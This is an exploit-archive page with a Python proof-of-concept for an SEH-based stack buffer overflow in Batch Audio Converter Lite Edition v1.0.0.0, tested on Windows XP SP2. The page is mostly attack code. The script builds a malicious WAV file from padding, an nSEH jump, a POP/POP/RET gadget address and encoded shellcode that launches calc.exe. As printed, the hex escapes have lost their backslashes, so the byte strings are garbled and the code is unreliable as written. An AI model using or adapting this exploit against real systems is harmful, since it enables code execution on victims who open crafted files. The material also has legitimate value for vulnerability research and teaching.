Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)
# Published : 2010-06-17
# Author : modpr0be
# Previous Title : Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
# Next Title : Rosoft Audio Converter 4.4.4 Buffer Overflow

# Software Link:
http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe
# Tested on: Windows XP SP2
# Type of Vuln: SEH
# Code : bacon-exploit.py
# Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus
lainnya ^^
# Thanks: All OffSec member

#!/usr/bin/python

import struct

junk = "A" * 4132
nseh = "xebx06x90x90"
seh = struct.pack('<L', 0x10029bb7) # pop edi pop esi ret from
lame_enc.dll
nop = "x90" * 30
print "[+] Preparing for file.."
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = ("x89xe3xdbxc6xd9x73xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4dx59x47x70x45x50x45x50x43x50x4cx49"
"x48x65x45x61x4ex32x42x44x4ex6bx50x52x44x70x4c"
"x4bx50x52x44x4cx4ex6bx42x72x45x44x4cx4bx43x42"
"x46x48x44x4fx4dx67x51x5ax46x46x44x71x4bx4fx44"
"x71x49x50x4ex4cx47x4cx51x71x51x6cx43x32x46x4c"
"x51x30x49x51x48x4fx46x6dx45x51x49x57x4dx32x48"
"x70x50x52x42x77x4cx4bx46x32x44x50x4cx4bx43x72"
"x47x4cx47x71x4ex30x4cx4bx47x30x51x68x4fx75x4f"
"x30x42x54x42x6ax46x61x4ax70x46x30x4cx4bx43x78"
"x46x78x4ex6bx43x68x47x50x45x51x4bx63x4bx53x47"
"x4cx47x39x4ex6bx47x44x4ex6bx46x61x48x56x50x31"
"x49x6fx50x31x4fx30x4cx6cx4bx71x4ax6fx44x4dx46"
"x61x48x47x46x58x4dx30x44x35x49x64x43x33x43x4d"
"x48x78x47x4bx51x6dx47x54x51x65x4bx52x43x68x4e"
"x6bx46x38x47x54x47x71x4ex33x43x56x4ex6bx46x6c"
"x50x4bx4cx4bx50x58x45x4cx46x61x4bx63x4ex6bx47"
"x74x4cx4bx43x31x4ax70x4cx49x42x64x44x64x46x44"
"x51x4bx51x4bx43x51x46x39x50x5ax42x71x4bx4fx4b"
"x50x46x38x51x4fx50x5ax4ex6bx45x42x48x6bx4cx46"
"x51x4dx51x7ax46x61x4cx4dx4fx75x4fx49x47x70x43"
"x30x43x30x46x30x42x48x50x31x4ex6bx50x6fx4dx57"
"x49x6fx4bx65x4fx4bx4bx4ex46x6ex50x32x49x7ax43"
"x58x4cx66x4fx65x4fx4dx4fx6dx4bx4fx48x55x47x4c"
"x47x76x51x6cx45x5ax4dx50x4bx4bx4dx30x44x35x43"
"x35x4dx6bx47x37x45x43x42x52x50x6fx51x7ax45x50"
"x51x43x49x6fx4bx65x43x53x45x31x42x4cx43x53x46"
"x4ex45x35x51x68x42x45x43x30x45x5ax41x41")

f = open('exploit.wav', 'w')
print "[+] Writing vulnerable WAV file.."
f.write(junk+nseh+seh+nop+shellcode)
f.close()
print "[+] Success writing file.."